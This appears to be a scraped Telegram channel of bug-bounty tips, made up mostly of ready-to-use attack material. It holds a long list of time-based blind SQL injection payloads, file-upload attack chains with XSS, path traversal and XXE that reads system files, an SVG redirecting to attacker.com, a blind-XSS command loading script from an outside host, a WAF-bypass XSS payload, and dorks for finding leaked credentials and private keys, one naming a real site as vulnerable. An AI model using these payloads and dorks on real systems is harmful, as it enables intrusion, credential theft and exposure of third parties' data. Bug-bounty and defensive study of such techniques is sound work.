Available now! Telegram Research 2025 β the year's key insights 
Bug bounty Tips
Open in Telegram
π‘οΈ Cybersecurity enthusiast | π» Helping secure the digital world | π Web App Tester | π΅οΈββοΈ OSINT Specialist Admin: @laazy_hack3r
Show more5 849
Subscribers
+1124 hours
+687 days
+37430 days
Posts Archive
5 849
π¨Subdominator - Unleash the Power of Subdomain Enumerationπ¨
π’Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
πLink- https://github.com/RevoltSecurities/Subdominator
5 849
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'5 849
Repost from Bug Bounty
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'5 849
this is the top xor blind payloads i collected that most guys used including my personal also that will sure help you :)
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true
polyglots payloads:
if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
5 849
π₯Chaining Vulnerabilities through File Uploadπ₯
SLQiβ³
'sleep(20).jpg sleep(25)-- -.jpgPath traversalβ³
../../etc/passwd/logo.png
../../../logo.png-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1β¦"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg><code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>5 849
π₯π₯Github-Dorkπππ₯π₯
Happy Hunting
π api_key
π app_AWS_SECRET_ACCESS_KEY
π app_secret
π authoriztion
π Ldap
π aws_access_key_id
π secret
π bash_history
π bashrc%20password
π beanstalkd
π client secre
π composer
π config
π credentials
π DB_PASSWORD
π dotfiles
π .env file
π .exs file
π extension:json mongolab.com
π extension:pem%20private
π extension:ppk private
π extension:sql mysql dump
π extension:yaml mongolab.com
π .mlab.com password
π mysql
π npmrc%20_auth
π passwd
π passkey
π rds.amazonaws.com password
π s3cfg
π send_key
π token
π filename:.bash_history
π filename:.bash_profile aws
π filename:.bashrc mailchimp
π filename:CCCam.cfg
π filename:config irc_pass
π filename:config.php dbpasswd
π filename:config.json auths
π filename:config.php pass
π filename:config.php dbpasswd
π filename:connections.xml
π filename:.cshrc
π filename:.git-credentials
π filename:.ftpconfig
π filename:.history
π filename:gitlab-recovery-codes.txt
π filename:.htpasswd
π filename:id_rsa
π filename:.netrc password
π FTP
π filename:wp-config.php
π git-credentials
π github_token
π HEROKU_API_KEY language:json
π HEROKU_API_KEY language:shell
π GITHUB_API_TOKEN language:shell
π oauth
π OTP
π databases password
π [WFClient] Password= extension:ica
π xoxa_Jenkins
π security_credentials
#bugbountytips #GitHub
5 849
Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden /api/Docs/index.html ==> 200 Ok
5 849
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.
Dork: site:*.example.com inurl:login | inurl:signin Google
5 849
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a Vulnerable Site- https://www.itronot.co.il/server-status
5 849
Google Dork - High % keywords π
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
5 849
Google Dork - Server Errors β‘
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
5 849
Google Dork - Sensitive Docs π
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:βconfidentialβ | intext:βNot for Public Releaseβ | intext:βinternal use onlyβ | intext:βdo not distributeβ
5 849
π’a XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)
π='',πΊ=!π+π,π=!πΊ+π,πΊ=π+{},π=πΊ[π++],
π=πΊ[π«=π],π=++π«+π,πΉ=πΊ[π«+π],πΊ[πΉ+=πΊ[π]
+(πΊ.π+πΊ)[π]+π[π]+π+π+πΊ[π«]+πΉ+π+πΊ[π]
+π]πΉ")()
(Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
5 849
New XSS Bypass Cloudflare WAF π§±
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
5 849
π«‘Automate Your XSS
#!/bin/bash read TARGET subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt cat waybackurls.txt | dalfox pipe
5 849
Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"
5 849
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
5 849
XSS Tip: If alert() is being converted to ALERT() and you can use Like
onerror="π='',π¨=!π+π,π=!π¨+π,π=π+{},π=π¨[π++],π΅=π¨[π=π],π=++π+π,π =π[π+π],π¨[π +=π[π]+(π¨.π+π)[π]+π[π]+π+π΅+π¨[π]+π +π+π[π]+π΅][π ](π[π]+π[π]+π¨[π]+π΅+π+'(π)')()"
